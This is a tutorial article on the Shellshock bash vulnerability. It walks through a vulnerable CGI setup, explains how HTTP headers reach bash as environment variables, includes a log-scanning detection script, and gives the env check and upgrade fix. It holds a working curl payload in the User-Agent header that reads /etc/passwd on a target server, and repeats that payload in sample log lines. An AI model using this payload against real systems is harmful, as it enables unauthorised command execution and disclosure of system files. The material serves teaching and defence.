What is Shellshock vulnerability

In This Article

  • What the security vulnerability known as Shellshock is
  • How an exploit can happen

What is ShellShock vulnerability

Shellshock is a vulnerability in bash, the most commonly used shell (command-line interpreter) program on Linux. Exploiting it results in arbitrary code execution (ACE). Any service on a target system that passes arguments from a client machine to bash for processing (e.g. a bash CGI script) could be vulnerable.

A sample exploit

Let's look at a sample case of a Shellshock exploit.

On machine A, with bash (my bash version is currently 4.2.39(1)) and the Apache server installed and running,

create the file /var/www/cgi-bin/test.cgi with the following content:

#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Sample bash CGI script"

Then run the following commands as the root user to give the CGI script the required permissions:

[user@localhost ~]$ chown apache:apache test.cgi
[user@localhost ~]$ chmod u+x test.cgi

Now, from machine B (another Linux box), access http://<machine A ip address>/cgi-bin/test.cgi in a browser and you will see the line “Sample bash CGI script”.

Now let's do the same from the command line (shell) on machine B.

[user@localhost ~]$ curl http://<machine A ip address>/cgi-bin/test.cgi

You will see the same “Sample bash CGI script” as the output.

Now, to see the /etc/passwd file, which holds information on all users of the target machine, you just have to do the following:

[user@localhost ~]$ curl -H "User-Agent:() { :; }; echo;/bin/cat /etc/passwd" http://<machine A ip address>/cgi-bin/test.cgi

What is happening here

When we request a web page, the requesting program (e.g. a browser) passes the URL, the parameters and some header information such as the browser name, HTTP version, method (GET/POST), etc. The HTTP server hands these values to a CGI program as environment variables (the User-Agent header, for example, becomes HTTP_USER_AGENT). When they reach a bash program, bash parses them, and the vulnerability causes the arbitrary command part to be executed on the target machine.
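Requests of this kind leave a trace in the web server's access log, because the function-definition prefix "() {" arrives in a logged header. The following is an added example, not part of the original article: it scans a log for that prefix, assuming Apache's "combined" log format; the function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag access-log entries whose request line, Referer or
# User-Agent carries the bash function-definition prefix "() {".
# Assumes Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"

# scan_log FILE -> prints "client_ip<TAB>field" for each suspicious entry
scan_log() {
    awk -F'"' '
    {
        # Splitting on double quotes: $2 request, $4 Referer, $6 User-Agent
        split($1, pre, " ")           # pre[1] is the client address
        hit = ""
        if      ($2 ~ /[(][)][ \t]*[{]/) hit = "request"
        else if ($4 ~ /[(][)][ \t]*[{]/) hit = "referer"
        else if ($6 ~ /[(][)][ \t]*[{]/) hit = "user-agent"
        if (hit != "") printf "%s\t%s\n", pre[1], hit
    }' "$1"
}

# count_hits FILE -> number of suspicious entries
count_hits() {
    scan_log "$1" | wc -l | tr -d ' '
}

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [01/Oct/2014:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 24 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.10 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 24 "-" "curl/7.29.0"
198.51.100.7 - - [01/Oct/2014:10:02:13 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1873 "-" "() { :; }; echo;/bin/cat /etc/passwd"
203.0.113.5 - - [01/Oct/2014:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 24 "() { :;}; echo probe" "Mozilla/5.0"
EOF

# Report the suspicious entries in the sample log.
scan_log "$SAMPLE_LOG"
```

The combined format records only the request line, Referer and User-Agent, so a payload carried in any other header will not show up in this log.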

Solution

The solution for Shellshock is to upgrade to a bash version in which it is fixed. To check whether your bash has this vulnerability, use the following command:

[user@localhost ~]$ env tst='() { :;}; echo Vulnerable' bash -c :

If the above command outputs ‘Vulnerable’, your shell is vulnerable to the Shellshock attack. If it exits quietly, the installed bash shell is safe.
